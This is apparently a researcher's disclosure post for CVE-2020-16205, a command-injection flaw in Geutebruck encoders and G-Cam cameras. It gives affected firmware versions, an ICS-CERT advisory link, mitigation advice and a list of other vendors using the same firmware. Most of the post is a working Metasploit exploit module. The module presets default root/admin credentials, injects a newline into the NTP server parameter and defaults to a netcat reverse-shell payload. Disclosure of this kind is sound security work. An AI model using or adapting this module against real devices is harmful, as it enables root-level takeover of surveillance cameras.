Abstract
Those who follow our blog know that we like Geutebruck cameras: we found many trivial RCE on their products since 2016.
A few months ago we found a new one. Those new attack vectors / vulnerabilites are affecting firmware versions 1.12.0.25 and prior as well as the limited Versions 1.12.13.2 and 1.12.14.5 of the following Encoder and E2 Series Camera models:
G-Code:
- EEC-2xxx
G-Cam:
- EBC-21xx
- EFD-22xx
- ETHC-22xx
- EWPC-22xx
Like before we’ve choose to “responsible disclose” this 0day vulnerability directly to Geutebruck and the ICS-CERT (Industrial Control Systems Cyber Emergency Response Team). Since then a new firmware has been released (1.12.0.27) to fix that, ICS-CERT has released an advisory and one CVE (CVE-2020-16205) has been assigned.
Many thanks to Geutebruck and ICS-CERT teams.
Advisory
https://us-cert.cisa.gov/ics/advisories/icsa-20-219-03
Exploit
This time we did a quick and dirty metasploit module with a check feature to check if your camera is vulnerable.
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'Geutebruck testaction.cgi Remote Command Execution',
'Description' => %q{
This module exploits a an arbitrary command execution vulnerability. The
vulnerability exists in the /uapi-cgi/testaction.cgi page and allows an
authenticated user to execute arbitrary commands with root privileges.
with web user privileges. Firmware <= 1.12.14.5 are concerned.
Tested on 5.02024 G-Cam/EFD-2250 running 1.12.14.5 firmware.
},
'Author' =>
[
'Davy Douhine'
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2020-16205' ],
[ 'URL', 'http://geutebruck.com' ],
[ 'URL', 'https://ics-cert.us-cert.gov/advisories/icsa-20-219-03' ]
],
'DisclosureDate' => 'May 20 2020',
'Privileged' => true,
'Platform' => ['unix', 'linux'],
'Arch' => [ARCH_ARMLE],
'Targets' => [
[ 'Automatic Target', { } ]
],
'DefaultTarget' => 0,
'DefaultOptions' =>
{
'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'
}
))
register_options(
[
OptString.new('HttpUsername', [ true, 'The username to authenticate as', 'root' ]),
OptString.new('HttpPassword', [ true, 'The password for the specified username', 'admin' ]),
OptString.new('TARGETURI', [true, 'The path to the testaction page', '/uapi-cgi/admin/testaction.cgi']),
], self.class)
end
def check
begin
res = send_request_cgi(
'method' => 'GET',
'uri' => '/brand.xml',
'query' => "",
)
if res && res.body.include?("1.12.14.5")
return CheckCode::Vulnerable
end
rescue ::Rex::ConnectionError
return CheckCode::Unknown
end
CheckCode::Safe
end
def exploit
user = datastore['HttpUsername']
pass = datastore['HttpPassword']
header = "type=ntp&server=%0a"
uri = target_uri.path + "?" + "#{header}" + Rex::Text.uri_encode(payload.encoded, "hex-all")
print_status("#{rhost}:#{rport} - Attempting to exploit...")
res = send_request_raw(
{
'method' => 'GET',
'uri' => uri
})
end
end
Mitigation
Geutebruck has released a new software version, Version 1.12.0.27, to address the identified vulnerability, which is available at the following location (registration needed):
http://www.geutebrueck.com/en_EN/login.html
If an update is not possible right now in between users can disable the “Enable anonymous access” option to mitigate the risk. The RCE will remain but will only be reachable by authenticated users.
In the wild
Many brands use the same firmware (and are vulnerable too):
- UDP Technology (which is also the supplier of the firmware for the other vendors)
- Ganz
- Visualint
- Cap
- THRIVE Intelligence
- Sophus
- VCA
- TripCorps
- Sprinx Technologies
- Smartec
- Riva